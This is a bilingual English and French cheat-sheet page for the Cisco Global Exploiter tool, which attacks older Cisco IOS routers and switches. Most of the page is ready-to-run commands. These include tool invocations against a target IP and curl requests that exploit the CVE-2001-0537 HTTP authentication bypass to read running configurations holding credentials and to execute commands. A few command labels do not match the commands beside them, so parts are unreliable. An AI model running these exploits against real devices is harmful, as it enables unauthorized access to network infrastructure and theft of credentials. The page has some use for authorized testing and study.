cisco-global-exploiter
Framework d'exploitation Cisco IOS. Teste les routeurs et switches Cisco pour plusieurs CVE connues, dont des contournements d'authentification, des élévations de privilèges et des vulnérabilités de déni de service. Cisco IOS exploitation framework. Tests Cisco routers and switches for multiple known CVEs including authentication bypasses, privilege escalation, and denial-of-service vulnerabilities.
↗ https://github.com/trailofbits/cgeOverview
Cisco Global Exploiter (CGE) tests Cisco devices for a set of known vulnerabilities including HTTP server exploits, authentication bypasses, and protocol-specific CVEs. It targets specific Cisco IOS vulnerabilities that can lead to unauthorized access or denial of service.
Basic Usage
Test a Cisco device for all vulnerabilities
cge.pl 192.168.1.1
Test specific vulnerability
cge.pl 192.168.1.1 3
List available exploits
cge.pl -h
Test with verbose output
cge.pl -v 192.168.1.1
Available Exploits
List of tested vulnerabilities:
cge.pl -h
# Typical CGE exploits include:
# 1. Cisco 677/678 Telnet Buffer Overflow
# 2. Cisco IOS Router Denial of Service
# 3. Cisco IOS HTTP Auth Bypass (CVE-2001-0537)
# 4. Cisco IOS HTTP Configuration Access
# 5. Cisco Catalyst SSH Protocol Mismatch DoS
# 6. Cisco IOS enable password bypass
# ... and more
Run specific test (by number)
cge.pl 192.168.1.1 3 # Test #3 only
Post-Exploitation
# If HTTP auth bypass succeeds (Cisco IOS Web Server):
# Access config via: http://192.168.1.1/level/15/exec/-/sh/run
Read running configuration (contains credentials)
curl http://192.168.1.1/level/15/exec/-/sh/run
Execute commands
curl http://192.168.1.1/level/15/exec/-/sh/run/cr
Write commands (careful!)
curl "http://192.168.1.1/level/15/exec/-/enable/cr"
Manual HTTP Auth Bypass (CVE-2001-0537)
# Vulnerable: Cisco IOS 11.3 to 12.2
# Bypass: Access /level/16/ to /level/99/ directories
# Read running config without auth
curl http://192.168.1.1/level/15/exec/-/show/run/cr
curl http://192.168.1.1/level/99/exec/-/show/run/cr
Check IOS version (revealed in HTTP headers)
curl -I http://192.168.1.1/
Tips
- CGE primarily targets older IOS vulnerabilities — may not apply to modern devices
- Always check IOS version first — many exploits are version-specific
- HTTP management interface is often disabled on hardened devices
- Use alongside ike-scan and snmpwalk for complete Cisco assessment
- Document findings before exploiting — Cisco devices often control critical infrastructure
Help / Man page
cge.pl [options] TARGET [exploit_number]
TARGET Cisco device IP
exploit_number Optional: run only this exploit
-h List all available exploits
-v Verbose output
If no exploit number specified, all exploits are tested.
Vue d’ensemble
Cisco Global Exploiter (CGE) teste les équipements Cisco pour un ensemble de vulnérabilités connues, dont des exploits de serveur HTTP, des contournements d’authentification et des CVE propres à certains protocoles. Il vise des vulnérabilités Cisco IOS précises pouvant mener à un accès non autorisé ou à un déni de service.
Utilisation de base
# Tester un équipement Cisco pour toutes les vulnérabilités
cge.pl 192.168.1.1
# Tester une vulnérabilité précise
cge.pl 192.168.1.1 3
# Lister les exploits disponibles
cge.pl -h
# Tester avec sortie verbeuse
cge.pl -v 192.168.1.1
Exploits disponibles
# Lister les vulnérabilités testées
cge.pl -h
# Les exploits CGE typiques incluent :
# 1. Cisco 677/678 Telnet Buffer Overflow
# 2. Cisco IOS Router Denial of Service
# 3. Cisco IOS HTTP Auth Bypass (CVE-2001-0537)
# 4. Cisco IOS HTTP Configuration Access
# 5. Cisco Catalyst SSH Protocol Mismatch DoS
# 6. Cisco IOS enable password bypass
# ... et plus
# Lancer un test précis (par numéro)
cge.pl 192.168.1.1 3 # Test #3 uniquement
Post-exploitation
# Si le contournement d'auth HTTP réussit (serveur web Cisco IOS) :
# Accéder à la config via : http://192.168.1.1/level/15/exec/-/sh/run
# Lire la configuration en cours (contient des identifiants)
curl http://192.168.1.1/level/15/exec/-/sh/run
# Exécuter des commandes
curl http://192.168.1.1/level/15/exec/-/sh/run/cr
# Écrire des commandes (prudence !)
curl "http://192.168.1.1/level/15/exec/-/enable/cr"
Contournement manuel d’auth HTTP (CVE-2001-0537)
# Vulnérable : Cisco IOS 11.3 à 12.2
# Contournement : accéder aux répertoires /level/16/ à /level/99/
# Lire la config en cours sans auth
curl http://192.168.1.1/level/15/exec/-/show/run/cr
curl http://192.168.1.1/level/99/exec/-/show/run/cr
# Vérifier la version IOS (révélée dans les en-têtes HTTP)
curl -I http://192.168.1.1/
Conseils
- CGE vise principalement d’anciennes vulnérabilités IOS : peut ne pas s’appliquer aux équipements modernes
- Vérifiez toujours d’abord la version IOS : beaucoup d’exploits sont spécifiques à une version
- L’interface de management HTTP est souvent désactivée sur les équipements durcis
- À utiliser aux côtés d’ike-scan et de snmpwalk pour une évaluation Cisco complète
- Documentez vos découvertes avant d’exploiter : les équipements Cisco contrôlent souvent une infrastructure critique
Aide / Page de manuel
cge.pl [options] TARGET [exploit_number]
TARGET Cisco device IP
exploit_number Optional: run only this exploit
-h List all available exploits
-v Verbose output
If no exploit number specified, all exploits are tested.